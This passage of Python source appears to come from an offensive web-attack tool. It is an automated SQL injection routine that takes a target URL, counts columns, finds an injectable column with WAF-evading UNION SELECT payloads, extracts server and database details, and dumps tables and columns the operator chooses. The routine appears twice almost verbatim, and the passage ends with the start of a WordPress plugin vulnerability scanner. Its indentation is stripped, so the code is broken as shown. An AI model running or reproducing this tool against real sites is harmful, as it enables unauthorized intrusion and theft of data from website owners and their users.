if 'Unknown column' in auto_sql_injection_request_orderby.text and '<div ' not in auto_sql_injection_request_orderby.text or '\'order clause\'' in auto_sql_injection_request_orderby.text and '<div ' not in auto_sql_injection_request_orderby.text:
auto_sql_injection_request_i = i
break
if '\''+ str(i) + '\'' in auto_sql_injection_request_orderby.text and '<div ' not in auto_sql_injection_request_orderby.text:
auto_sql_injection_request_i = i
break
elif auto_sql_injection_orderby_result == 'err3':
if 'Unknown column' in auto_sql_injection_request_orderby.text or '\'order clause\'' in auto_sql_injection_request_orderby.text:
auto_sql_injection_request_i = i
break
if '\''+ str(i) + '\'' in auto_sql_injection_request_orderby.text:
auto_sql_injection_request_i = i
break
if not auto_sql_injection_request_i:
print ('[!] - Not Able to Find How Many Columns!')
print ('')
web_application_attack()
print ('[~] - Columns: {0}'.format(str(auto_sql_injection_request_i - 1)))
for i in range(auto_sql_injection_request_i):
auto_sql_injection_request_ii = auto_sql_injection_request_ii + 1
if auto_sql_injection_request_ii == auto_sql_injection_request_i:
auto_sql_injection_request_ii = auto_sql_injection_request_ii - 1
auto_sql_injection_request_iii += '{0},'.format(str(auto_sql_injection_request_ii))
break
auto_sql_injection_request_iii += '{0},'.format(str(auto_sql_injection_request_ii))
auto_sql_injection_request_iii = auto_sql_injection_request_iii.replace(str(auto_sql_injection_request_ii) + ',' + str(auto_sql_injection_request_ii) + ',', str(auto_sql_injection_request_ii))
print ('')
print ('{2}[{1}#{2}] {3}- {4}Please put "-" after "=". Example: =-1337{0}'.format(reset + bold, green, blue, yellow, cyan))
if sys.version_info[0] == 3:
target = str(input('Target> '))
if sys.version_info[0] == 2:
target = str(raw_input('Target> '))
print ('')
if 'http://' in target:
url = target
hostname = target.replace('http://', '')
elif 'https://' in target:
url = target
hostname = target.replace('https://', '')
if '://' not in target:
url = 'http://' + target
hostname = target
print ('[~] - Finding Vulnerable Column:')
auto_sql_injection_request_vulncolumn = requests.get('{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii))
auto_sql_injection_request_vulncolumn_soup = BeautifulSoup(auto_sql_injection_request_vulncolumn.content, 'html.parser')
auto_sql_injection_request_vulncolumn_nums = re.findall('\d+', str(auto_sql_injection_request_vulncolumn_soup))
auto_sql_injection_request_vulncolumn_possible_vulncolumn = []
auto_sql_injection_request_vulncolumn_column = ''
for i in auto_sql_injection_request_vulncolumn_nums:
if len(i) < 2:
auto_sql_injection_request_vulncolumn_possible_vulncolumn.append(i)
if i == 0:
pass
auto_sql_injection_request_vulncolumn_possible_vulncolumn = list(set(auto_sql_injection_request_vulncolumn_possible_vulncolumn))
auto_sql_injection_request_vulncolumn_column = ''
for i in auto_sql_injection_request_vulncolumn_possible_vulncolumn:
print ('\tTrying -> {0}'.format(str(i)))
auto_sql_injection_request_dios_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + i + ',', ',' + dios1 + ',')
auto_sql_injection_request_dios = requests.get(auto_sql_injection_request_dios_url)
if 'Table:' in auto_sql_injection_request_dios.text and 'id="PureBlood"' in auto_sql_injection_request_dios.text:
auto_sql_injection_request_dios_soup = BeautifulSoup(auto_sql_injection_request_dios.content, 'html.parser')
auto_sql_injection_request_dios_url = auto_sql_injection_request_dios_url
auto_sql_injection_request_vulncolumn_column = i
break
if not auto_sql_injection_request_vulncolumn_column:
print ('[!] - Not Able to Find The Vulnerable Column!')
print ('')
web_application_attack()
print ('[+] - Vulnerable Column: {0}'.format(str(auto_sql_injection_request_vulncolumn_column)))
auto_sql_injection_request_hostname_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_hostname + ',')
auto_sql_injection_request_tmpdir_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_tmpdir + ',')
auto_sql_injection_request_datadir_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_datadir + ',')
auto_sql_injection_request_version_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_version + ',')
auto_sql_injection_request_basedir_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_basedir + ',')
auto_sql_injection_request_user_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_user + ',')
auto_sql_injection_request_database_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_database + ',')
auto_sql_injection_request_schema_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_schema + ',')
auto_sql_injection_request_uuid_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_uuid + ',')
auto_sql_injection_request_system_user_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_system_user + ',')
auto_sql_injection_request_session_user_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_session_user + ',')
auto_sql_injection_request_symlink_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_symlink + ',')
auto_sql_injection_request_ssl_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_ssl + ',')
auto_sql_injection_request_hostname = requests.get(auto_sql_injection_request_hostname_url)
auto_sql_injection_request_tmpdir = requests.get(auto_sql_injection_request_tmpdir_url)
auto_sql_injection_request_datadir = requests.get(auto_sql_injection_request_datadir_url)
auto_sql_injection_request_version = requests.get(auto_sql_injection_request_version_url)
auto_sql_injection_request_basedir = requests.get(auto_sql_injection_request_basedir_url)
auto_sql_injection_request_user = requests.get(auto_sql_injection_request_user_url)
auto_sql_injection_request_database = requests.get(auto_sql_injection_request_database_url)
auto_sql_injection_request_schema = requests.get(auto_sql_injection_request_schema_url)
auto_sql_injection_request_uuid = requests.get(auto_sql_injection_request_uuid_url)
auto_sql_injection_request_system_user = requests.get(auto_sql_injection_request_system_user_url)
auto_sql_injection_request_session_user = requests.get(auto_sql_injection_request_session_user_url)
auto_sql_injection_request_symlink = requests.get(auto_sql_injection_request_symlink_url)
auto_sql_injection_request_ssl = requests.get(auto_sql_injection_request_ssl_url)
sqli_hostname_soup = BeautifulSoup(auto_sql_injection_request_hostname.text, 'html.parser')
sqli_tmpdir_soup = BeautifulSoup(auto_sql_injection_request_tmpdir.text, 'html.parser')
sqli_datadir_soup = BeautifulSoup(auto_sql_injection_request_datadir.text, 'html.parser')
sqli_version_soup = BeautifulSoup(auto_sql_injection_request_version.text, 'html.parser')
sqli_basedir_soup = BeautifulSoup(auto_sql_injection_request_basedir.text, 'html.parser')
sqli_user_soup = BeautifulSoup(auto_sql_injection_request_user.text, 'html.parser')
sqli_database_soup = BeautifulSoup(auto_sql_injection_request_database.text, 'html.parser')
sqli_schema_soup = BeautifulSoup(auto_sql_injection_request_schema.text, 'html.parser')
sqli_uuid_soup = BeautifulSoup(auto_sql_injection_request_uuid.text, 'html.parser')
sqli_system_user_soup = BeautifulSoup(auto_sql_injection_request_system_user.text, 'html.parser')
sqli_session_user_soup = BeautifulSoup(auto_sql_injection_request_session_user.text, 'html.parser')
sqli_symlink_soup = BeautifulSoup(auto_sql_injection_request_symlink.text, 'html.parser')
sqli_ssl_soup = BeautifulSoup(auto_sql_injection_request_ssl.text, 'html.parser')
sqli_hostname = sqli_hostname_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_tmpdir = sqli_tmpdir_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_datadir = sqli_datadir_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_version = sqli_version_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_basedir = sqli_basedir_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_user = sqli_user_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_database = sqli_database_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_schema = sqli_schema_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_uuid = sqli_uuid_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_system_user = sqli_system_user_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_session_user = sqli_session_user_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_symlink = sqli_symlink_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_ssl = sqli_ssl_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
print ('[+] Hostname: {0}'.format(sqli_hostname))
print ('[+] TMP Directory: {0}'.format(sqli_tmpdir))
print ('[+] Data Directory: {0}'.format(sqli_datadir))
print ('[+] Database Version: {0}'.format(sqli_version))
print ('[+] Base Directory: {0}'.format(sqli_basedir))
print ('[+] Current User: {0}'.format(sqli_user))
print ('[+] Current Database: {0}'.format(sqli_database))
print ('[+] Current Schema: {0}'.format(sqli_schema))
print ('[+] System UUID Key: {0}'.format(sqli_uuid))
print ('[+] Current System User: {0}'.format(sqli_system_user))
print ('[+] Session User: {0}'.format(sqli_session_user))
print ('[+] Is Sysmlink Enabled?: {0}'.format(sqli_symlink))
print ('[+] Is SSL Enabled?: {0}'.format(sqli_ssl))
print ('')
print ('[~] Dumping Database:')
auto_sql_injection_request_dios_soup_pureblood = auto_sql_injection_request_dios_soup.findAll('strong', attrs={'id': 'PureBlood'})
auto_sql_injection_request_dios_soup_pureblood_list = []
for i in auto_sql_injection_request_dios_soup_pureblood:
if i.text in auto_sql_injection_request_dios_soup_pureblood_list:
pass
else:
auto_sql_injection_request_dios_soup_pureblood_list.append(i.text)
for i in auto_sql_injection_request_dios_soup_pureblood_list:
print ('\t{0}'.format(i))
print ('')
sqli_table = ''
user_choice = ''
sqli_column = []
print ('{2}[{1}#{2}] {3}- {4}Just enter exit/done if you want to start dumping{0}'.format(reset + bold, green, blue, yellow, cyan))
while True:
if sys.version_info[0] == 3:
if sqli_table:
pass
elif not sqli_table:
user_choice1 = str(input('Table> '))
sqli_table = user_choice1
user_choice = str(input('\tColumn> '))
if user_choice == 'done' or user_choice == 'exit' or user_choice == '':
break
else:
sqli_column.append(user_choice)
if sys.version_info[0] == 2:
if sqli_table:
pass
elif not sqli_table:
user_choice1 = str(raw_input('Table> '))
sqli_table = user_choice1
user_choice = str(raw_input('\tColumn> '))
if user_choice == 'done' or user_choice == 'exit' or user_choice == '':
break
else:
sqli_column.append(user_choice)
print ('')
print ('[~] Dumping Columns:')
for i in sqli_column:
auto_sql_injection_request_column_dump_list = []
auto_sql_injection_request_column_dump_url = '{0}{1} /*!50000Union*/ all select {2} from {3}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii, sqli_table)
auto_sql_injection_request_column_dump_url = auto_sql_injection_request_column_dump_url.replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_dump_column_payload + ',')
auto_sql_injection_request_column_dump_url = auto_sql_injection_request_column_dump_url.replace('<column>', i)
auto_sql_injection_request_column_dump = requests.get(auto_sql_injection_request_column_dump_url)
auto_sql_injection_request_column_dump_soup = BeautifulSoup(auto_sql_injection_request_column_dump.text, 'html.parser')
auto_sql_injection_request_column_dump_soup_pureblood = auto_sql_injection_request_column_dump_soup.find_all('strong', attrs={'id': 'PureBloodINFO'})
for ii in auto_sql_injection_request_column_dump_soup_pureblood:
if ii.text in auto_sql_injection_request_column_dump_list:
pass
elif ii.text not in auto_sql_injection_request_column_dump_list:
auto_sql_injection_request_column_dump_list.append(ii.text)
for iii in auto_sql_injection_request_column_dump_list:
print ('\t{0} -> {1}'.format(i, iii))
elif auto_sql_injection_request_result == 'Vulnerable2': # error_output() == False
auto_sql_injection_request_ii = 0
auto_sql_injection_request_iii = ''
print ('[~] - Counting How Many Columns:')
auto_sql_injection_request_orderby = requests.get('{0}\' order by {1}--+'.format(url, '1'))
auto_sql_injection_request_orderby_html = BeautifulSoup(auto_sql_injection_request_orderby.text, 'html.parser')
if 'mysql_fetch_row():' in auto_sql_injection_request_orderby.text:
auto_sql_injection_orderby_result = 'err1'
print ('YES')
else:
auto_sql_injection_orderby_result = ''
if auto_sql_injection_orderby_result == 'err1':
single_quote_payload = ''
else:
single_quote_payload = '\''
for i in range(50):
if i == 0:
i = i + 1
print ('\tColumn -> {0}'.format(str(i)))
auto_sql_injection_request_orderby = requests.get('{0}{1} order by {2}--+'.format(url, single_quote_payload, str(i)))
auto_sql_injection_request_orderby_html = BeautifulSoup(auto_sql_injection_request_orderby.text, 'html.parser')
auto_sql_injection_request_orderby_html_h1 = auto_sql_injection_request_orderby_html.find_all('h1')
auto_sql_injection_request_orderby_html_h2 = auto_sql_injection_request_orderby_html.find_all('h2')
auto_sql_injection_request_orderby_html_h3 = auto_sql_injection_request_orderby_html.find_all('h3')
auto_sql_injection_request_orderby_html_p = auto_sql_injection_request_orderby_html.find_all('p')
if auto_sql_injection_request_orderby.status_code == 403 or auto_sql_injection_request_orderby.status_code == 406:
break
if auto_sql_injection_request_origin_html_h1 != auto_sql_injection_request_orderby_html_h1:
auto_sql_injection_request_i = i
break
elif auto_sql_injection_request_origin_html_h2 != auto_sql_injection_request_orderby_html_h2:
auto_sql_injection_request_i = i
break
elif auto_sql_injection_request_origin_html_h3 != auto_sql_injection_request_orderby_html_h3:
auto_sql_injection_request_i = i
break
elif auto_sql_injection_request_origin_html_p != auto_sql_injection_request_orderby_html_p:
auto_sql_injection_request_i = i
break
if not auto_sql_injection_request_i:
for i in range(50):
print ('\tColumn -> {0}'.format(str(i)))
auto_sql_injection_request_orderby = requests.get('{0}{1} group by {2}--+'.format(url, single_quote_payload, str(i)))
auto_sql_injection_request_orderby_html = BeautifulSoup(auto_sql_injection_request_orderby.text, 'html.parser')
auto_sql_injection_request_orderby_html_h1 = auto_sql_injection_request_orderby_html.find_all('h1')
auto_sql_injection_request_orderby_html_h2 = auto_sql_injection_request_orderby_html.find_all('h2')
auto_sql_injection_request_orderby_html_h3 = auto_sql_injection_request_orderby_html.find_all('h3')
auto_sql_injection_request_orderby_html_p = auto_sql_injection_request_orderby_html.find_all('p')
if auto_sql_injection_request_orderby.status_code == 403 or auto_sql_injection_request_orderby.status_code == 406:
print ('[!] - Not Vulnerable!')
print ('')
web_application_attack()
if auto_sql_injection_request_origin_html_h1 != auto_sql_injection_request_orderby_html_h1:
auto_sql_injection_request_i = i
break
elif auto_sql_injection_request_origin_html_h2 != auto_sql_injection_request_orderby_html_h2:
auto_sql_injection_request_i = i
break
elif auto_sql_injection_request_origin_html_h3 != auto_sql_injection_request_orderby_html_h3:
auto_sql_injection_request_i = i
break
elif auto_sql_injection_request_origin_html_p != auto_sql_injection_request_orderby_html_p:
auto_sql_injection_request_i = i
break
if not auto_sql_injection_request_i:
print ('[!] - Not Able to Find How Many Columns!')
print ('')
web_application_attack()
print ('[+] - Columns: {0}'.format(str(auto_sql_injection_request_i - 1)))
for i in range(auto_sql_injection_request_i):
auto_sql_injection_request_ii = auto_sql_injection_request_ii + 1
if auto_sql_injection_request_ii == auto_sql_injection_request_i:
auto_sql_injection_request_ii = auto_sql_injection_request_ii - 1
auto_sql_injection_request_iii += '{0},'.format(str(auto_sql_injection_request_ii))
break
auto_sql_injection_request_iii += '{0},'.format(str(auto_sql_injection_request_ii))
auto_sql_injection_request_iii = auto_sql_injection_request_iii.replace(str(auto_sql_injection_request_ii) + ',' + str(auto_sql_injection_request_ii) + ',', str(auto_sql_injection_request_ii))
print ('')
print ('{2}[{1}#{2}] {3}- {4}Please put "-" after "=". Example: =-1337{0}'.format(reset + bold, green, blue, yellow, cyan))
if sys.version_info[0] == 3:
target = str(input('Target> '))
if sys.version_info[0] == 2:
target = str(raw_input('Target> '))
print ('')
if 'http://' in target:
url = target
hostname = target.replace('http://', '')
elif 'https://' in target:
url = target
hostname = target.replace('https://', '')
if '://' not in target:
url = 'http://' + target
hostname = target
print ('[~] - Finding Vulnerable Column:')
auto_sql_injection_request_vulncolumn = requests.get('{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii))
auto_sql_injection_request_vulncolumn_soup = BeautifulSoup(auto_sql_injection_request_vulncolumn.content, 'html.parser')
auto_sql_injection_request_vulncolumn_nums = re.findall('\d+', str(auto_sql_injection_request_vulncolumn_soup))
auto_sql_injection_request_vulncolumn_possible_vulncolumn = []
auto_sql_injection_request_vulncolumn_column = ''
for i in auto_sql_injection_request_vulncolumn_nums:
if len(i) < 2:
auto_sql_injection_request_vulncolumn_possible_vulncolumn.append(i)
if i == 0:
pass
auto_sql_injection_request_vulncolumn_possible_vulncolumn = list(set(auto_sql_injection_request_vulncolumn_possible_vulncolumn))
auto_sql_injection_request_vulncolumn_column = ''
for i in auto_sql_injection_request_vulncolumn_possible_vulncolumn:
print ('\tTrying -> {0}'.format(str(i)))
auto_sql_injection_request_dios_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + i + ',', ',' + dios1 + ',')
auto_sql_injection_request_dios = requests.get(auto_sql_injection_request_dios_url)
if 'Table:' in auto_sql_injection_request_dios.text and 'id="PureBlood"' in auto_sql_injection_request_dios.text:
auto_sql_injection_request_dios_soup = BeautifulSoup(auto_sql_injection_request_dios.content, 'html.parser')
auto_sql_injection_request_dios_url = auto_sql_injection_request_dios_url
auto_sql_injection_request_vulncolumn_column = i
break
if not auto_sql_injection_request_vulncolumn_column:
print ('[!] - Not Vulnerable!')
print ('')
web_application_attack()
print ('[+] - Vulnerable Column: {0}'.format(str(auto_sql_injection_request_vulncolumn_column)))
auto_sql_injection_request_hostname_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_hostname + ',')
auto_sql_injection_request_tmpdir_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_tmpdir + ',')
auto_sql_injection_request_datadir_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_datadir + ',')
auto_sql_injection_request_version_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_version + ',')
auto_sql_injection_request_basedir_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_basedir + ',')
auto_sql_injection_request_user_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_user + ',')
auto_sql_injection_request_database_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_database + ',')
auto_sql_injection_request_schema_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_schema + ',')
auto_sql_injection_request_uuid_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_uuid + ',')
auto_sql_injection_request_system_user_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_system_user + ',')
auto_sql_injection_request_session_user_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_session_user + ',')
auto_sql_injection_request_symlink_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_symlink + ',')
auto_sql_injection_request_ssl_url = '{0}{1} /*!50000Union*/ all select {2}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii).replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_payload_ssl + ',')
auto_sql_injection_request_hostname = requests.get(auto_sql_injection_request_hostname_url)
auto_sql_injection_request_tmpdir = requests.get(auto_sql_injection_request_tmpdir_url)
auto_sql_injection_request_datadir = requests.get(auto_sql_injection_request_datadir_url)
auto_sql_injection_request_version = requests.get(auto_sql_injection_request_version_url)
auto_sql_injection_request_basedir = requests.get(auto_sql_injection_request_basedir_url)
auto_sql_injection_request_user = requests.get(auto_sql_injection_request_user_url)
auto_sql_injection_request_database = requests.get(auto_sql_injection_request_database_url)
auto_sql_injection_request_schema = requests.get(auto_sql_injection_request_schema_url)
auto_sql_injection_request_uuid = requests.get(auto_sql_injection_request_uuid_url)
auto_sql_injection_request_system_user = requests.get(auto_sql_injection_request_system_user_url)
auto_sql_injection_request_session_user = requests.get(auto_sql_injection_request_session_user_url)
auto_sql_injection_request_symlink = requests.get(auto_sql_injection_request_symlink_url)
auto_sql_injection_request_ssl = requests.get(auto_sql_injection_request_ssl_url)
sqli_hostname_soup = BeautifulSoup(auto_sql_injection_request_hostname.text, 'html.parser')
sqli_tmpdir_soup = BeautifulSoup(auto_sql_injection_request_tmpdir.text, 'html.parser')
sqli_datadir_soup = BeautifulSoup(auto_sql_injection_request_datadir.text, 'html.parser')
sqli_version_soup = BeautifulSoup(auto_sql_injection_request_version.text, 'html.parser')
sqli_basedir_soup = BeautifulSoup(auto_sql_injection_request_basedir.text, 'html.parser')
sqli_user_soup = BeautifulSoup(auto_sql_injection_request_user.text, 'html.parser')
sqli_database_soup = BeautifulSoup(auto_sql_injection_request_database.text, 'html.parser')
sqli_schema_soup = BeautifulSoup(auto_sql_injection_request_schema.text, 'html.parser')
sqli_uuid_soup = BeautifulSoup(auto_sql_injection_request_uuid.text, 'html.parser')
sqli_system_user_soup = BeautifulSoup(auto_sql_injection_request_system_user.text, 'html.parser')
sqli_session_user_soup = BeautifulSoup(auto_sql_injection_request_session_user.text, 'html.parser')
sqli_symlink_soup = BeautifulSoup(auto_sql_injection_request_symlink.text, 'html.parser')
sqli_ssl_soup = BeautifulSoup(auto_sql_injection_request_ssl.text, 'html.parser')
sqli_hostname = sqli_hostname_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_tmpdir = sqli_tmpdir_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_datadir = sqli_datadir_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_version = sqli_version_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_basedir = sqli_basedir_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_user = sqli_user_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_database = sqli_database_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_schema = sqli_schema_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_uuid = sqli_uuid_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_system_user = sqli_system_user_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_session_user = sqli_session_user_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_symlink = sqli_symlink_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
sqli_ssl = sqli_ssl_soup.find('strong', attrs={'id': 'PureBloodINFO'}).text
print ('[+] Hostname: {0}'.format(sqli_hostname))
print ('[+] TMP Directory: {0}'.format(sqli_tmpdir))
print ('[+] Data Directory: {0}'.format(sqli_datadir))
print ('[+] Database Version: {0}'.format(sqli_version))
print ('[+] Base Directory: {0}'.format(sqli_basedir))
print ('[+] Current User: {0}'.format(sqli_user))
print ('[+] Current Database: {0}'.format(sqli_database))
print ('[+] Current Schema: {0}'.format(sqli_schema))
print ('[+] System UUID Key: {0}'.format(sqli_uuid))
print ('[+] Current System User: {0}'.format(sqli_system_user))
print ('[+] Session User: {0}'.format(sqli_session_user))
print ('[+] Is Sysmlink Enabled?: {0}'.format(sqli_symlink))
print ('[+] Is SSL Enabled?: {0}'.format(sqli_ssl))
print ('')
print ('[~] Dumping Database:')
auto_sql_injection_request_dios_soup_pureblood_list = []
auto_sql_injection_request_dios_soup_pureblood = auto_sql_injection_request_dios_soup.findAll('strong', attrs={'id': 'PureBlood'})
for i in auto_sql_injection_request_dios_soup_pureblood:
if i.text in auto_sql_injection_request_dios_soup_pureblood_list:
pass
else:
auto_sql_injection_request_dios_soup_pureblood_list.append(i.text)
for i in auto_sql_injection_request_dios_soup_pureblood_list:
print ('\t{0}'.format(i))
print ('')
sqli_table = ''
user_choice = ''
sqli_column = []
print ('{2}[{1}#{2}] {3}- {4}Just enter exit/done if you want to start dumping{0}'.format(reset + bold, green, blue, yellow, cyan))
while True:
if sys.version_info[0] == 3:
if sqli_table:
pass
elif not sqli_table:
user_choice1 = str(input('Table> '))
sqli_table = user_choice1
user_choice = str(input('\tColumn> '))
if user_choice == 'done' or user_choice == 'exit' or user_choice == '':
break
else:
sqli_column.append(user_choice)
if sys.version_info[0] == 2:
if sqli_table:
pass
elif not sqli_table:
user_choice1 = str(raw_input('Table> '))
sqli_table = user_choice1
user_choice = str(raw_input('\tColumn> '))
if user_choice == 'done' or user_choice == 'exit' or user_choice == '':
break
else:
sqli_column.append(user_choice)
print ('')
print ('[~] Dumping Columns:')
for i in sqli_column:
auto_sql_injection_request_column_dump_list = []
auto_sql_injection_request_column_dump_url = '{0}{1} /*!50000Union*/ all select {2} from {3}--+'.format(url, single_quote_payload, auto_sql_injection_request_iii, sqli_table)
auto_sql_injection_request_column_dump_url = auto_sql_injection_request_column_dump_url.replace(',' + auto_sql_injection_request_vulncolumn_column + ',', ',' + sqli_dump_column_payload + ',')
auto_sql_injection_request_column_dump_url = auto_sql_injection_request_column_dump_url.replace('<column>', i)
auto_sql_injection_request_column_dump = requests.get(auto_sql_injection_request_column_dump_url)
auto_sql_injection_request_column_dump_soup = BeautifulSoup(auto_sql_injection_request_column_dump.text, 'html.parser')
auto_sql_injection_request_column_dump_soup_pureblood = auto_sql_injection_request_column_dump_soup.find_all('strong', attrs={'id': 'PureBloodINFO'})
for ii in auto_sql_injection_request_column_dump_soup_pureblood:
if ii.text in auto_sql_injection_request_column_dump_list:
pass
elif ii.text not in auto_sql_injection_request_column_dump_list:
auto_sql_injection_request_column_dump_list.append(ii.text)
for iii in auto_sql_injection_request_column_dump_list:
print ('\t{0} -> {1}'.format(i, iii))
def wordpress_vulnerability_check(self, wvc_url):
print ('[#] - Checking (WordPress Woocommerce - Directory Craversal):')
wp_woocommerce_wvc_url = ''
wp_woocommerce = requests.get(wvc_url + '/wp-content/plugins/woocommerce/templates/emails/plain')
wp_woocommerce_wvc_url = wvc_url + '/wp-content/plugins/woocommerce/templates/emails/plain'
if wp_woocommerce.status_code == 200:
print ('\t[+] - Vulnerable! ~ ' + wp_woocommerce_wvc_url)
elif wp_woocommerce.status_code == 301:
print ('\t[!] - Redirected! ~ ' + wp_woocommerce_wvc_url)
elif wp_woocommerce.status_code == 403:
print ('\t[!] - Forbidden! ~ ' + wp_woocommerce_wvc_url)
else:
print ('\t[!] - 404 Found! ~ ' + wp_woocommerce_wvc_url)
print ('\n\n[#] - Checking (Wordpress Plugin Booking Calendar 3.0.0 - SQL Injection / Cross-Site Scripting):')
wp_plugin_booking_calendar_wvc_url = ''
wp_plugin_booking_calendar = requests.get(wvc_url + '/BOOKING_WP/wp-content/plugins/wp-booking-calendar/public/ajax/getMonthCalendar.php')
if wp_plugin_booking_calendar.status_code == 200:
wp_plugin_booking_calendar = wp_plugin_booking_calendar
wp_plugin_booking_calendar_wvc_url = wvc_url + '/BOOKING_WP/wp-content/plugins/wp-booking-calendar/public/ajax/getMonthCalendar.php'
elif wp_plugin_booking_calendar.status_code == 404:
